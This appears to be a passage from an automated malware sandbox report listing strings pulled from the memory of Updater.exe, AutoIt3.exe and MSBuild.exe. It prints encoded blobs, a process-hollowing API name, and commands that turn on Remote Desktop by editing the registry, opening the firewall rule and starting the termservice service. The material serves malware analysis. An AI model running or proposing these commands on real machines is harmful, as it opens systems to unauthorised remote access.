cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 00000026.00000002.2411185727.0000000004550000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: MSBuild.exe String found in binary or memory: net start termservice
Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: MSBuild.exe, 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: net start termservice
Source: AutoIt3.exe, 0000002A.00000003.2497527821.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 